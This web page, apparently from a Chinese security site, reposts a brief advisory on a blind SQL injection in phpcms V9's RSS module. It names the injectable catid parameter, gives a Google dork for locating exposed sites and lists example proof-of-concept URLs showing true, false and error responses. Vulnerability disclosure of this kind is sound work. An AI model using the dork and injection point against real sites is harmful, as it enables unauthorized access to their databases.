phpcms V9 BLind SQL 注入漏洞0day

admin 漏洞分析 2022-02-17 09:46:54 漏洞分析漏洞注入 catid content& rss& http://host/index.ph"

　　影响版本：phpcms v9 blind

　　官方网站：http://www.phpcms.cn

　　漏洞类型：SQL注入

　　漏洞描述：phpcms v9 blind 参数过滤存在SQL注入漏洞。

　　google dork:inurl:"index.php?m=content+c=rss+catid=10"

　　exploit & p0c

　　[!] index.php?m=content&c=rss&catid=[valid catid]

　　Example p0c

　　[!] http://host/index.php?m=content&c=rss&catid=10 <= True

　　[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

　　[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

版权声明

本文仅代表作者观点，不代表本站立场。
本文系作者授权发表，未经许可，不得转载。
本文地址：/websafe/loudongfenxi/149510.html

上一篇 : Zblog最新跨站漏洞及利用代码

下一篇 : AWBS 2.9.2 Blind SQL 注入0day

留言与评论（共有 0 条评论）

1000元配置

2000元配置

3000元配置

4000元配置

5000元配置

6000元配置

7000元配置

8000元配置

9000元配置

万元配置

i3配置

i5配置

i7配置

APU配置

R5配置

R7配置

游戏攻略

软件教程

Win10教程

Win7教程

Mac教程

Linux教程

U盘教程

Server教程

phpcms V9 BLind SQL 注入漏洞0day

版权声明

热门文章

最近发表

标签列表

| 桂ICP备2023010378号-4

Powered By EmpireCMS

phpcms V9 BLind SQL 注入漏洞0day

版权声明

相关文章

热门文章

最近发表

标签列表

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?1cc50873f5e983e8073d99a425b87921"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); | 桂ICP备2023010378号-4

Powered By EmpireCMS

| 桂ICP备2023010378号-4